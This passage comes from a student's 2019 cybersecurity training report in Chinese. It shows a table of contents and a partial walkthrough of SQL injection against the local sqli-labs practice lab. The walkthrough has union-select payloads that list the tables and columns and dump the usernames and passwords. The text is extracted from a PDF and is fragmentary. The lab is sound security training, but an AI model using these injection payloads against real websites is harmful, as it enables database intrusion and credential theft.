具体步骤截图说明1

2019 暑期网络空间安全专业网络安全实训

目 录

一、 实训概述 ........................................................................................................................... 4

二、 实训学习记录 ................................................................................................................... 4

2.1 环境部署 ....................................................................................................................... 4

2.1.1 移动安全基础环境 ........................................................................................... 4

2.1.2 协议安全基础环境 ........................................................................................... 5

2.1.3 Web 安全基础环境 ........................................................................................... 6

2.2.6 TCP 会话劫持 ................................................................................................ 26

2.2.7 DNS 欺骗攻击 ................................................................................................ 31

2.3 移动安全攻防实训记录 ............................................................................................. 37

2.3.1 安卓木马制作 ................................................................................................. 37

2.3.2 安卓木马绑定 ................................................................................................. 41

2.4 Web 安全攻防实训记录............................................................................................. 46

2.4.1 SQLi 漏洞 ....................................................................................................... 46

2.4.2 XSS 漏洞 ........................................................................................................ 55

2019 暑期网络空间安全专业网络安全实训

2.4.3 文件上传漏洞 ................................................................................................. 62

2.4.4 代码审计 ......................................................................................................... 71

2.6 基线检查及系统加固 ............................................................................................... 120

2.6.1 Windows........................................................................................................ 120

2.6.2 Apache .......................................................................................................... 123

2.6.3 Ubuntu 16.04 ................................................................................................. 127

2.6.4 MySQL .......................................................................................................... 133

三、 实训心得体会 ............................................................................................................... 138

2019 暑期网络空间安全专业网络安全实训

第 45/ 136 页

或删除。

1、 漏洞危害

1) 会泄漏数据库中存储的用户隐私信息。

SQL 注入攻击指的是通过构建特殊的输入作为参数传入 Web 应用程序，而这些输

入大都是 SQL 语法里的一些组合，通过执行 SQL 语句进而执行攻击者所要的操作，其

主要原因是程序没有细致地过滤用户输入的数据，致使非法数据侵入系统。

SQL 注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据

库平台的漏洞所致；后者主要是由于程序员对输入未进行细致地过滤，从而执行了非法

的数据查询。

3、 漏洞利用条件

1) 攻击者可以控制输入的数据

2) 服务器要执行的代码拼接了控制的数据

4、 漏洞利用步骤记录

2019 暑期网络空间安全专业网络安全实训

第 46/ 136 页

1) Less-1： 先访问靶场第一关，访问 id=2-1 出错，判断查询语句为字符型。猜测闭

通过 orderby 判断表的列数，输入 http://127.0.0.1/sqli-labs/sqli-labs/Less-1/?id=1' order

三列。

union select1,2,3--+发现表的显示位有两位。

2019 暑期网络空间安全专业网络安全实训

第 47/ 136 页

用 database() 爆库名：输入 http://127.0.0.1/sqli-labs/sqli-labs/Less-1/?id=1' union

利用’users’ 表爆列名： 输入 http://127.0.0.1/sqli-labs/sqli-labs/Less-1/?id=1' union

select1,2,group_concat(column_name) from information_schema.columns where

table_name=’users’ --+，爆出列名有 id,username,password,Id,name,sex,age,description

对用户名和密码进行爆破：http://127.0.0.1/sqli-labs/sqli-labs/Less-1/?id=1' union

select1,2,group_concat(username,”:”,password ) from users--+，得到所有的用户名和

密码